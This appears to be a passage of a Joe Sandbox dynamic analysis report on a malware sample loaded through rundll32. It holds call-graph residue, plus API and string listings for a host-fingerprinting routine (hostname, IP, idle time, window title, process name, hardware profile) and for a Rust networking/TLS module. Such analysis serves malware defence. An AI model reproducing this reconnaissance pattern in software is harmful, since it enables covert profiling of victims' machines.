108680->108681 108682 6cbdd3d0 108680->108682 108699 6cc61e20 26 API calls 108681->108699 108698 6cbe4097 RtlFreeHeap 108682->108698 108684->108587 108686->108587 108687->108587 108688->108586 108689->108586 108690->108586 108693->108684 108694->108684 108695->108674 108696->108676 108697->108678 108698->108684 108702 6cbc5a90 3 API calls 108701->108702 108703 6cbde68e 108702->108703 108703->108607 108704 6cc61e40 26 API calls 108703->108704 108706 6cc50110 3 API calls 108705->108706 108707 6cc47ac2 108706->108707 108708 6cc47acc 108707->108708 108709 6cc47b4e 108707->108709 108712 6cbc180b 108708->108712 108716 6cc64c50 26 API calls 108708->108716 108717 6cc61e40 26 API calls 108709->108717 108712->108513 108718->108621 108720->108618 108721->108628 108730 6cbf9e6e 108723->108730 108731 6cbf9e8d 108730->108731 108732 
[Execution graph data: serialized node and edge list (function addresses 6cbc5a90 through 6cc65699 with per-node API call counts) belonging to the report's interactive graph viewer; it is not readable as text. API names recorded in this fragment: NtDeviceIoControlFile, RtlNtStatusToDosError, RtlFreeHeap, WakeByAddressSingle, WaitOnAddress, GetLastError, WSAGetLastError, getsockname, getpeername, setsockopt, connect, WSAIoctl, memmove, memcmp, CertCloseStore, CertDuplicateStore, CertDuplicateCertificateContext, FreeContextBuffer, __aulldiv.]
110734->111225 110776 6cc026ff 110735->110776 111234 6cbf58f1 27 API calls 110735->111234 110736 6cc0183b 111223 6cbf5af6 RtlFreeHeap 110736->111223 110744 6cbeb679 43 API calls 110740->110744 110742 6cc01847 111226 6cbeb573 43 API calls __aulldiv 110742->111226 110743->110734 111224 6cbea7a2 26 API calls 110743->111224 110748 6cc021e5 110744->110748 110754 6cc021f5 memmove 110748->110754 110755 6cc0272f 110748->110755 110750 6cc027a0 111235 6cbeb449 27 API calls 110750->111235 110754->110755 110763 6cc0221c memmove 110754->110763 111233 6cc02ad4 RtlFreeHeap 110755->111233 110758 6cc01f0c 111237 6cbf5af6 RtlFreeHeap 110758->111237 110760 6cc01a68 110765 6cc01ad1 110760->110765 110766 6cc01a71 110760->110766 110763->110722 111229 6cbf5af6 RtlFreeHeap 110765->111229 111227 6cc58c9e 30 API calls 110766->111227 110775 6cc01a90 111228 6cbeb573 43 API calls __aulldiv 110775->111228 111236 6cc02ad4 57 API calls 110776->111236 110784 6cc027d9 110784->110711 110791 6cc5849d 28 API calls 110784->110791 110795 6cc0288d 110791->110795 110795->110711 111239 6cbe9d4c RtlFreeHeap 110795->111239 110808 6cc01880 110807->110808 110809 6cc01c13 110807->110809 110812 6cc625d0 26 API calls 110808->110812 111240 6cc38dc4 46 API calls 110809->111240 110813 6cc0210b 110812->110813 110814 6cc62860 26 API calls 110813->110814 110817 6cc02115 110814->110817 110821 6cc62860 26 API calls 110817->110821 110824 6cc0211f 110821->110824 110826 6cc62860 26 API calls 110824->110826 110828 6cc02129 110826->110828 110831 6cc026f3 110828->110831 110836 6cc02174 110828->110836 110864 6cc026ff 110831->110864 111242 6cbf58f1 27 API calls 110831->111242 110832 6cc01c4f 110832->109835 110839 6cbeb679 43 API calls 110836->110839 110844 6cc021e5 110839->110844 110848 6cc021f5 memmove 110844->110848 110849 6cc0272f 110844->110849 110846 6cc027a0 111243 6cbeb449 27 API calls 110846->111243 110848->110849 110856 6cc0221c memmove 110848->110856 111241 6cc02ad4 RtlFreeHeap 110849->111241 110853 6cc01f0c 111245 
6cbf5af6 RtlFreeHeap 110853->111245 110856->110832 111244 6cc02ad4 57 API calls 110864->111244 110865 6cc027d9 110866 6cc5849d 28 API calls 110865->110866 110872 6cc0280b 110865->110872 110868 6cc0288d 110866->110868 110867 6cbf8282 RtlFreeHeap 110869 6cc02819 110867->110869 110868->110872 111247 6cbe9d4c RtlFreeHeap 110868->111247 111246 6cc02bf0 RtlFreeHeap 110869->111246 110872->110832 110872->110867 110873->109844 110874->109851 110875->109859 110876->109853 110878 6cc46ad4 110877->110878 110879 6cc465d5 26 API calls 110878->110879 110880 6cc46b39 110879->110880 110881 6cc46d0c 110880->110881 110882 6cc46b58 110880->110882 111248 6cc6421b 26 API calls 110881->111248 110884 6cc46bc2 GetModuleHandleW 110882->110884 110885 6cc46c69 110882->110885 110887 6cc46c77 AcquireCredentialsHandleA 110884->110887 110888 6cc46bd5 GetProcAddress 110884->110888 110885->110887 110886 6cc46d22 111249 6cc61e40 26 API calls 110886->111249 110889 6cc46cb7 110887->110889 110890 6cc46cab 110887->110890 110888->110887 110891 6cc46be8 memset 110888->110891 110893 6cc50110 3 API calls 110889->110893 110895 6cc60989 RtlFreeHeap 110890->110895 110896 6cc46c19 110891->110896 110894 6cc46cd4 110893->110894 110894->110886 110894->110890 110897 6cc197aa 110895->110897 110896->110887 110897->109860 110897->109863 110898->109867 110899->109871 110900->109876 110901->109889 110902->109880 110908->109866 110909->109870 110913->109885 110919->109850 110921 6cbeb6ae WSASocketW 110920->110921 110922 6cbeb855 110920->110922 110924 6cbeb6c9 ioctlsocket 110921->110924 110925 6cbeb6f0 GetLastError 110921->110925 110974 6cc64940 110922->110974 110928 6cbeb6e9 110924->110928 110929 6cbeb736 GetLastError 110924->110929 110971 6cbeb449 27 API calls 110925->110971 110926 6cbeb87b 110976 6cbebb1b RtlFreeHeap 110926->110976 110972 6cbebafa 27 API calls 110928->110972 110929->110928 110930 6cbeb70a 110930->110924 110950 6cbeb716 110930->110950 110932 6cbeb75a 110936 6cbeb88f 110932->110936 110945 6cbeb762 
closesocket 110932->110945 110973 6cc47a4f setsockopt GetLastError 110932->110973 110968 6cc4768c bind 110936->110968 110937 6cbeb7ae 110937->110926 110938 6cbeb7c1 WSAIoctl 110937->110938 110938->110936 110940 6cbeb84a GetLastError 110938->110940 110940->110926 110943 6cbeb9c7 110944 6cbeb9fe 110943->110944 110943->110945 110946 6cbeba2e 110944->110946 110978 6cc47a4f setsockopt GetLastError 110944->110978 110945->110950 110947 6cbeba61 110946->110947 110980 6cc47a4f setsockopt GetLastError 110946->110980 110947->110950 110982 6cc47a4f setsockopt GetLastError 110947->110982 110950->110100 110950->110101 110951 6cbeba1a 110951->110946 110979 6cbebb1b RtlFreeHeap 110951->110979 110952 6cbeba4d 110952->110947 110981 6cbebb1b RtlFreeHeap 110952->110981 110955 6cbeba8a 110955->110950 110959->110095 110960->110098 110961->110095 110962->110105 110963->110110 111009 6cbd9d0b RtlFreeHeap 110964->111009 110966 6cbf828f 110967->110111 110969 6cc476a5 GetLastError 110968->110969 110970 6cbeb986 110968->110970 110969->110970 110977 6cbebafa 27 API calls 110970->110977 110971->110930 110972->110932 110973->110937 110984 6cc64964 110974->110984 110976->110936 110977->110943 110978->110951 110979->110946 110980->110952 110981->110947 110982->110955 110985 6cc649e7 110984->110985 110986 6cc6497e 110984->110986 110993 6cc4f9b0 110985->110993 110986->110985 110987 6cc64adf 110986->110987 110988 6cc649ce WaitOnAddress 110986->110988 110988->110986 110990 6cc649de GetLastError 110988->110990 110990->110986 110991 6cc64ad6 WakeByAddressAll 110991->110987 110994 6cc4fa06 110993->110994 110995 6cc4f9cc memset WSAStartup 110993->110995 111007 6cc625b0 26 API calls 110994->111007 110996 6cc4f9f5 110995->110996 110997 6cc4fa10 110995->110997 110996->110987 110996->110991 111008 6cc65030 26 API calls 110997->111008 111009->110966 111011 6cc029f2 111010->111011 111012 6cc029c6 111010->111012 111040 6cc02c76 RtlFreeHeap 111011->111040 111014 6cc01540 111012->111014 111015 6cc029db 
111012->111015 111016 6cbf796c RtlFreeHeap 111012->111016 111014->110131 111018 6cc02974 27 API calls 111014->111018 111015->111014 111039 6cc02c76 RtlFreeHeap 111015->111039 111016->111015 111018->110129 111019->110135 111020->110146 111021->110160 111022->110166 111023->110167 111024->110166 111025->110184 111026->110199 111027->110146 111028->110150 111030->110151 111031->110147 111032->110200 111033->110174 111034->110200 111035->110182 111036->110208 111037->110145 111038->110135 111039->111014 111040->111014 111041->110233 111042->110238 111043->110241 111044->110246 111045->110246 111071 6cbcaae0 111046->111071 111049 6cc02974 27 API calls 111049->110259 111050->110313 111051->110344 111052->110254 111053->110264 111054->110269 111055->110270 111056->110269 111057->110289 111058->110308 111059->110254 111060->110256 111062->110353 111063->110249 111064->110309 111065->110277 111066->110309 111067->110287 111068->110320 111069->110303 111070->110344 111087 6cbcac10 111071->111087 111073 6cbcab10 111073->110249 111073->111049 111075 6cbcabd0 111094 6cc62270 26 API calls 111075->111094 111076 6cbcab81 111077 6cbcac10 26 API calls 111076->111077 111079 6cbcab90 111077->111079 111080 6cbcabe1 111079->111080 111081 6cbcab9c 111079->111081 111095 6cc62550 26 API calls 111080->111095 111083 6cbcabf0 111081->111083 111084 6cbcaba1 memmove 111081->111084 111096 6cc62270 26 API calls 111083->111096 111084->111073 111092 6cbcab08 111087->111092 111093 6cbcac20 111087->111093 111088 6cbcac52 111088->111092 111098 6cc621d0 26 API calls 111088->111098 111092->111073 111092->111075 111092->111076 111093->111088 111093->111092 111097 6cc621d0 26 API calls 111093->111097 111099->110364 111100->110370 111101->110375 111102->110390 111103->110390 111104->110426 111105->110448 111106->110417 111107->110411 111108->110421 111109->110425 111110->110427 111111->110425 111112->110434 111113->110446 111114->110411 111115->110414 111117->110480 111118->110403 111120->110404 
111121->110392 111122->110404 111123->110397 111124->110406 111125->110443 111126->110417 111128 6cc57511 26 API calls 111127->111128 111129 6cc57a48 111128->111129 111131 6cc57a53 111129->111131 111171 6cc576c0 111129->111171 111133 6cc57a6b 111131->111133 111175 6cc64295 26 API calls 111131->111175 111134 6cc5a44b 111133->111134 111135 6cc5a457 111134->111135 111136 6cc5a451 111134->111136 111137 6cc625d0 26 API calls 111135->111137 111136->110486 111138 6cc5a467 111137->111138 111139 6cc5a470 111138->111139 111140 6cc625d0 26 API calls 111138->111140 111139->110486 111141->110499 111177 6cbf4854 NtCreateFile 111142->111177 111145 6cc57bc7 closesocket 111144->111145 111146 6cc57b9e 111144->111146 111145->110514 111189 6cbf51f4 29 API calls 111146->111189 111148 6cc57ba6 111149 6cc57bbd 111148->111149 111190 6cbf4e65 29 API calls 111148->111190 111151 6cbc5ad0 RtlFreeHeap 111149->111151 111151->111145 111152->110493 111153->110530 111154->110531 111155->110539 111156->110539 111157->110530 111158->110506 111159->110506 111166->110514 111172 6cc576d2 111171->111172 111173 6cc576c9 111171->111173 111176 6cc624a0 26 API calls 111172->111176 111173->111131 111178 6cbf4883 RtlNtStatusToDosError 111177->111178 111179 6cbf48e2 CreateIoCompletionPort 111177->111179 111187 6cbc6110 26 API calls 111178->111187 111181 6cbf4905 SetFileCompletionNotificationModes 111179->111181 111182 6cbf4924 GetLastError CloseHandle 111179->111182 111181->111182 111184 6cbf4915 111181->111184 111182->111184 111183 6cbf48c7 111183->111179 111185 6cbf4c31 111184->111185 111188 6cc469bc 26 API calls 111184->111188 111187->111183 111188->111185 111189->111148 111190->111149 111191->110568 111192->110574 111193->110645 111194->110598 111195->110604 111196->110605 111197->110604 111198->110621 111199->110636 111200->110645 111201->110589 111203->110594 111204->110578 111205->110637 111206->110612 111207->110637 111208->110669 111209->110641 111210->110586 111211->110574 111212->110676 
111213->110680 111214->110676 111215->110685 111216->110689 111217->110697 111218->110690 111219->110705 111220->110711 111221->110723 111222->110736 111223->110742 111224->110743 111225->110742 111226->110760 111227->110775 111228->110723 111229->110727 111231->110728 111232->110724 111233->110776 111234->110750 111235->110776 111236->110758 111237->110784 111238->110722 111239->110711 111241->110864 111242->110846 111243->110864 111244->110853 111245->110865 111246->110832 111247->110872 111248->110886 111250->110032 111251->109963 111252->109971 111253->109965 111254->109979 111255->109983 111256->109988 111257->110001 111258->109992 111259->110004 111260->110027 111261->110015 111262->110036 111263->110042 111264->109978 111265->109982 111266->110044 111269->109997 111270->110016 111271->110005 111272->110013 111273->110021 111274->110032 111275->109962 111277->109726 111278->109735 111280->109735 111281->109735 111282->109731 111283->109734 111284 6cbf59e4 111285 6cbf5a05 GetQueuedCompletionStatusEx 111284->111285 111287 6cbf5ad1 GetLastError 111285->111287 111288 6cbf5ac0 111285->111288 111289 6cbf5ac7 111287->111289 111288->111289 111294 6cc62270 26 API calls 111288->111294 111295 6cbc3942 111296 6cbc3993 111295->111296 111297 6cc46a1a RtlFreeHeap 111296->111297 111298 6cbc399e 111297->111298 111299 6cbc39ad 111298->111299 111300 6cbc39a2 SetThreadErrorMode 111298->111300 111301 6cbc5872 111299->111301 111435 6cbf397d 111299->111435 111300->111299 111482 6cc624e0 26 API calls 111301->111482 111303 6cbc39db GetProcAddress 111306 6cbc3a2a 111303->111306 111439 6cbc11ec 111306->111439 111308 6cbc3a3a 111311 6cbf397d 29 API calls 111308->111311 111310 6cbc5a08 111484 6cc61e20 26 API calls 111310->111484 111314 6cbc3ab5 GetProcAddress 111311->111314 111313 6cbc5a18 111485 6cc621d0 26 API calls 111313->111485 111318 6cbc3b04 111314->111318 111320 6cbc11ec RtlFreeHeap 111318->111320 111321 6cbc3b14 111320->111321 111323 6cbf397d 29 API calls 111321->111323 111325 
6cbc3b8f GetProcAddress 111323->111325 111327 6cbc3be5 111325->111327 111328 6cbc11ec RtlFreeHeap 111327->111328 111329 6cbc3bf5 111328->111329 111330 6cbc584b 111329->111330 111331 6cbc3cb7 111329->111331 111450 6cc4fdd0 30 API calls __aulldiv 111329->111450 111483 6cc624e0 26 API calls 111330->111483 111334 6cc492c0 26 API calls 111331->111334 111333 6cbc3cd8 111451 6cc50060 26 API calls 111333->111451 111335 6cbc3cfd 111334->111335 111337 6cc35107 26 API calls 111335->111337 111410 6cbc3d04 111337->111410 111339 6cbc580f 111340 6cc62860 26 API calls 111339->111340 111342 6cbc5819 111340->111342 111477 6cc61e20 26 API calls 111342->111477 111344 6cbc5827 111478 6cc621d0 26 API calls 111344->111478 111346 6cbc5834 111479 6cc62270 26 API calls 111346->111479 111350 6cbc52b5 111464 6cc35891 RtlFreeHeap 111350->111464 111351 6cbc5841 111480 6cc625b0 26 API calls 111351->111480 111354 6cbe7384 26 API calls 111354->111410 111355 6cbc5702 111356 6cbc57b9 111355->111356 111368 6cbc571f 111355->111368 111475 6cc3479f 46 API calls 111356->111475 111360 6cbc52a9 111446 6cc19135 111360->111446 111361 6cc0c75a 26 API calls 111361->111410 111362 6cbc57dc 111476 6cc621d0 26 API calls 111362->111476 111364 6cc60391 memcmp 111364->111410 111367 6cbf3b30 27 API calls 111367->111410 111368->111360 111474 6cc35891 RtlFreeHeap 111368->111474 111377 6cbc5307 111377->111330 111379 6cbc538b 111377->111379 111465 6cc4fdd0 30 API calls __aulldiv 111377->111465 111378 6cc467e8 3 API calls 111378->111410 111383 6cc492c0 26 API calls 111379->111383 111381 6cbc51f1 memmove 111381->111410 111382 6cbc53ac 111466 6cc50060 26 API calls 111382->111466 111387 6cbc53d7 111383->111387 111384 6cbf3b68 RtlFreeHeap 111384->111410 111389 6cc35107 26 API calls 111387->111389 111390 6cbc53de memmove 111389->111390 111403 6cbc5429 111390->111403 111392 6cc35358 51 API calls 111392->111403 111393 6cbc47c2 111486 6cc62720 26 API calls 111393->111486 111394 6cbf3c53 26 API calls 111394->111410 111395 6cbc4d32 
111481 6cc625b0 26 API calls 111395->111481 111399 6cbc4d4f memmove 111399->111410 111401 6cbf3b84 26 API calls 111401->111410 111403->111392 111406 6cbc54b0 111403->111406 111467 6cc4a520 30 API calls 111403->111467 111468 6cc4fdd0 30 API calls __aulldiv 111403->111468 111469 6cc599b8 28 API calls 111403->111469 111470 6cc4a6f0 30 API calls 111403->111470 111404 6cbf3bce memcmp 111404->111410 111408 6cc19135 RtlFreeHeap 111406->111408 111407 6cc11676 memcmp 111407->111410 111411 6cbc5511 111408->111411 111410->111313 111410->111339 111410->111342 111410->111344 111410->111346 111410->111350 111410->111351 111410->111354 111410->111355 111410->111360 111410->111361 111410->111362 111410->111364 111410->111367 111410->111378 111410->111381 111410->111384 111410->111393 111410->111394 111410->111395 111410->111401 111410->111404 111410->111407 111444 6cc35358 111410->111444 111452 6cbdd702 27 API calls 111410->111452 111453 6cbf3c99 memcmp 111410->111453 111454 6cbf3a94 26 API calls 111410->111454 111455 6cbf3bd9 27 API calls 111410->111455 111456 6cbcdef4 26 API calls 111410->111456 111457 6cbce1da 26 API calls 111410->111457 111458 6cbcdef4 26 API calls 111410->111458 111459 6cc35891 RtlFreeHeap 111410->111459 111460 6cc4a520 30 API calls 111410->111460 111461 6cc4fdd0 30 API calls __aulldiv 111410->111461 111462 6cc599b8 28 API calls 111410->111462 111463 6cc4a6f0 30 API calls 111410->111463 111411->111330 111412 6cc467e8 3 API calls 111411->111412 111413 6cbc555f 111412->111413 111413->111310 111414 6cbc5573 memmove 111413->111414 111415 6cbc559a 111414->111415 111415->111330 111416 6cbc55b0 GetCurrentProcess 111415->111416 111417 6cbc55d8 111416->111417 111418 6cbc561b memmove GetCurrentProcess 111417->111418 111419 6cbc55f0 111417->111419 111420 6cbc5663 111418->111420 111471 6cc4eea0 28 API calls 111419->111471 111422 6cbc5745 111420->111422 111423 6cbc5672 GetCurrentProcess 111420->111423 111426 6cbc574b CreateWaitableTimerExW 111422->111426 111423->111419 
111424 6cbc56dc 111472 6cbf5758 RtlFreeHeap 111424->111472 111428 6cbc57ac Sleep 111426->111428 111429 6cbc575c SetWaitableTimer 111426->111429 111427 6cbc56e9 111473 6cbf5758 RtlFreeHeap 111427->111473 111428->111426 111431 6cbc578c WaitForSingleObject CloseHandle 111429->111431 111432 6cbc57a5 CloseHandle 111429->111432 111431->111426 111434 6cbc57a3 111431->111434 111432->111428 111433 6cbc56f4 FreeLibrary 111434->111428 111436 6cbf398f 111435->111436 111437 6cbf3999 111435->111437 111487 6cbc5c70 29 API calls 111436->111487 111437->111303 111440 6cbc11ff 111439->111440 111441 6cbc11f1 111439->111441 111440->111308 111488 6cbc11dc RtlFreeHeap 111441->111488 111443 6cbc11fe 111443->111308 111489 6cc35379 51 API calls 111444->111489 111447 6cc19159 111446->111447 111448 6cc1913b 111446->111448 111447->111377 111448->111447 111449 6cbc5ad0 RtlFreeHeap 111448->111449 111449->111447 111450->111333 111451->111331 111452->111410 111453->111410 111454->111410 111455->111410 111456->111410 111457->111410 111458->111399 111459->111410 111460->111410 111461->111410 111462->111410 111463->111410 111464->111360 111465->111382 111466->111379 111467->111403 111468->111403 111469->111403 111470->111403 111471->111424 111472->111427 111473->111433 111474->111360 111475->111360 111487->111437 111488->111443 111490 6cc36d3c 111534 6cc36d7f 111490->111534 111499 6cc37756 111565 6cbf58f1 27 API calls 111499->111565 111502 6cc3770a 111503 6cc373e9 AcceptSecurityContext 111503->111534 111504 6cc36f27 CertGetCertificateChain 111506 6cc3705f GetLastError 111504->111506 111504->111534 111506->111534 111507 6cc37458 InitializeSecurityContextW 111507->111534 111508 6cc47325 CertEnumCertificatesInStore CertDuplicateCertificateContext 111508->111534 111511 6cc37107 CertVerifyCertificateChainPolicy 111512 6cc371da GetLastError 111511->111512 111511->111534 111515 6cc3720f CertFreeCertificateChain 111512->111515 111513 6cc374c0 FreeContextBuffer 111513->111534 111515->111534 111516 6cc3778c 
111566 6cc3696c RtlFreeHeap 111516->111566 111517 6cc376f1 CertFreeCertificateChain 111517->111534 111521 6cc37799 111567 6cbda132 RtlFreeHeap 111521->111567 111522 6cc36977 26 API calls 111522->111534 111524 6cc36ed3 CertFreeCertificateContext CertFreeCertificateContext 111524->111534 111525 6cc379f5 27 API calls 111525->111534 111528 6cc370c6 CertFreeCertificateChain 111528->111534 111530 6cc37563 FreeContextBuffer 111530->111534 111532 6cc11676 memcmp 111532->111534 111533 6cc375f4 FreeContextBuffer 111533->111534 111534->111499 111534->111502 111534->111503 111534->111504 111534->111507 111534->111508 111534->111511 111534->111513 111534->111515 111534->111516 111534->111517 111534->111522 111534->111524 111534->111525 111534->111528 111534->111532 111535 6cc37809 111534->111535 111542 6cc472af QueryContextAttributesW 111534->111542 111544 6cc47397 111534->111544 111547 6cc36924 111534->111547 111550 6cc3ecc8 26 API calls 111534->111550 111551 6cc369f7 RtlFreeHeap 111534->111551 111552 6cc472ee CertAddCertificateContextToStore GetLastError 111534->111552 111553 6cc472dc CertCloseStore 111534->111553 111554 6cc46d4b CertDuplicateCertificateChain CertFreeCertificateChain CertFreeCertificateChain 111534->111554 111555 6cc46ddc CertDuplicateCertificateContext 111534->111555 111556 6cc10bd1 RtlFreeHeap 111534->111556 111557 6cc378cd 52 API calls 111534->111557 111558 6cc46f4b 29 API calls 111534->111558 111559 6cc36939 26 API calls 111534->111559 111560 6cc46438 27 API calls 111534->111560 111561 6cc46438 27 API calls 111534->111561 111562 6cc3696c RtlFreeHeap 111534->111562 111563 6cbda132 RtlFreeHeap 111534->111563 111564 6cc4725d QueryContextAttributesW 111534->111564 111538 6cc37836 111535->111538 111537 6cc378bb 111581 6cc622d0 26 API calls 111537->111581 111538->111537 111541 6cc378a0 111538->111541 111568 6cc36a0c 40 API calls 111538->111568 111569 6cc58739 111538->111569 111541->111534 111543 6cc472c6 111542->111543 111543->111534 111545 6cc4739c 
CertDuplicateStore 111544->111545 111546 6cc473aa 111544->111546 111545->111546 111546->111534 111589 6cc358cd 111547->111589 111550->111534 111551->111534 111552->111534 111553->111504 111554->111534 111555->111534 111556->111534 111557->111534 111558->111534 111559->111534 111560->111530 111561->111533 111562->111534 111563->111534 111564->111534 111565->111502 111566->111521 111567->111502 111568->111538 111578 6cc5876e 111569->111578 111571 6cc588d1 111588 6cc625b0 26 API calls 111571->111588 111572 6cc587ad send 111574 6cc587d1 WSAGetLastError 111572->111574 111572->111578 111574->111578 111575 6cc588a7 111575->111538 111578->111571 111578->111572 111578->111575 111580 6cbf5588 RtlFreeHeap 111578->111580 111582 6cc57ee3 111578->111582 111585 6cbf4da7 35 API calls 111578->111585 111586 6cc57cef 26 API calls 111578->111586 111587 6cbe7fe5 RtlFreeHeap 111578->111587 111580->111578 111583 6cc57d41 41 API calls 111582->111583 111584 6cc57eee 111583->111584 111584->111578 111585->111578 111586->111578 111587->111578 111592 6cbe733e 111589->111592 111593 6cbe735d 111592->111593 111594 6cbe734a 111592->111594 111598 6cc62550 26 API calls 111593->111598 111595 6cbe7352 111594->111595 111599 6cc62270 26 API calls 111594->111599 111595->111534

                              Control-flow Graph
                              [Basic-block graph of the function at 4db53c0-4db59bd (residue of the interactive graph widget, including its Executed / Not Executed colour legend) not reproduced; the APIs its blocks call are listed under APIs below.]
                              APIs
                                • Part of subcall function 04DBF667: _malloc.LIBCMT ref: 04DBF681
                              • _memset.LIBCMT ref: 04DB53FC
                              • _memset.LIBCMT ref: 04DB5415
                              • _memset.LIBCMT ref: 04DB5425
                              • gethostname.WS2_32(?,00000032), ref: 04DB5433
                              • gethostbyname.WS2_32(?), ref: 04DB543D
                              • inet_ntoa.WS2_32 ref: 04DB5455
                              • _strcat_s.LIBCMT ref: 04DB5468
                              • _strcat_s.LIBCMT ref: 04DB5481
                              • inet_ntoa.WS2_32 ref: 04DB54AA
                              • _strcat_s.LIBCMT ref: 04DB54BD
                              • _strcat_s.LIBCMT ref: 04DB54D6
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04DB5503
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04DB5517
                              • GetLastInputInfo.USER32(?), ref: 04DB552A
                              • GetTickCount.KERNEL32 ref: 04DB5530
                              • wsprintfW.USER32 ref: 04DB5565
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 04DB5578
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 04DB558C
                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04DB55E3
                              • wsprintfW.USER32 ref: 04DB55FC
                              • GetForegroundWindow.USER32 ref: 04DB5621
                              • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 04DB5638
                              • lstrlenW.KERNEL32(000008CC), ref: 04DB565F
                              • lstrlenW.KERNEL32(00000994), ref: 04DB56C5
                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 04DB5736
                              • GetProcAddress.KERNEL32(00000000), ref: 04DB573D
                              • GetNativeSystemInfo.KERNEL32(?), ref: 04DB574E
                              • GetSystemInfo.KERNEL32(?), ref: 04DB5759
                              • wsprintfW.USER32 ref: 04DB5792
                              • GetCurrentProcessId.KERNEL32 ref: 04DB57A4
                              • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 04DB57BA
                              • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 04DB57D7
                              • CloseHandle.KERNEL32(04DD5164), ref: 04DB580B
                              • GetTickCount.KERNEL32 ref: 04DB5875
                              • __time64.LIBCMT ref: 04DB5884
                              • __localtime64.LIBCMT ref: 04DB58BB
                              • wsprintfW.USER32 ref: 04DB58F4
                              • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 04DB5909
                              • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 04DB5918
                              • GetCurrentHwProfileW.ADVAPI32(?), ref: 04DB5925
                                • Part of subcall function 04DB8060: GetLogicalDriveStringsW.KERNEL32(000003E8,?,00000AD4,75BF73E0,00000000), ref: 04DB80A2
                                • Part of subcall function 04DB8060: lstrcmpiW.KERNEL32(?,A:\), ref: 04DB80D6
                                • Part of subcall function 04DB8060: lstrcmpiW.KERNEL32(?,B:\), ref: 04DB80E6
                                • Part of subcall function 04DB8060: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 04DB8116
                                • Part of subcall function 04DB8060: lstrlenW.KERNEL32(?), ref: 04DB8127
                                • Part of subcall function 04DB8060: __wcsnicmp.LIBCMT ref: 04DB813E
                                • Part of subcall function 04DB8060: lstrcpyW.KERNEL32(00000AD4,?), ref: 04DB8174
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                              • String ID: %d min$1.0$2024.12.19$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                              • API String ID: 1101047656-3885306478
                              • Opcode ID: a9bf0a2291f239a99b1a7eab1be56aa66f17508423fe9dc6a9b17a3a6c80700f
                              • Instruction ID: 8eb93ed12fd88febd644cbf1ea067a9b265202bf40c19dfada239805d5ee7708
                              • Opcode Fuzzy Hash: a9bf0a2291f239a99b1a7eab1be56aa66f17508423fe9dc6a9b17a3a6c80700f
                              • Instruction Fuzzy Hash: B1F194B1A40304EFDB24DF64DC95FDB77B8EB48704F004599E64A97281EA70BA48CFA5
                              APIs
                              • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CC14875
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC14886
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC149AB
                              • memmove.VCRUNTIME140(?,?,00000148), ref: 6CC149DF
                              • memmove.VCRUNTIME140(?,?,00000148), ref: 6CC149F7
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC14A3A
                              • memmove.VCRUNTIME140(?,?,00000188), ref: 6CC14A7C
                              • memmove.VCRUNTIME140(?,?,00000029), ref: 6CC14C4B
                              Strings
                              • P, xrefs: 6CC15FC1
                              • uri host is valid header value, xrefs: 6CC17895
                              • authority implies host, xrefs: 6CC178AD
                              • domain is valid Uri, xrefs: 6CC17849
                              • Flatten polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.31\src\future\future\flatten.rs, xrefs: 6CC177E9
                              • U9W{, xrefs: 6CC152AE
                              • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CC17801, 6CC17861
                              • cannot poll Select twice, xrefs: 6CC14981
                              • Map must not be polled after it returned `Poll::Ready`, xrefs: 6CC177D7
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: Flatten polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.31\src\future\future\flatten.rs$Map must not be polled after it returned `Poll::Ready`$P$U9W{$authority implies host$cannot poll Select twice$domain is valid Uri$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs$uri host is valid header value
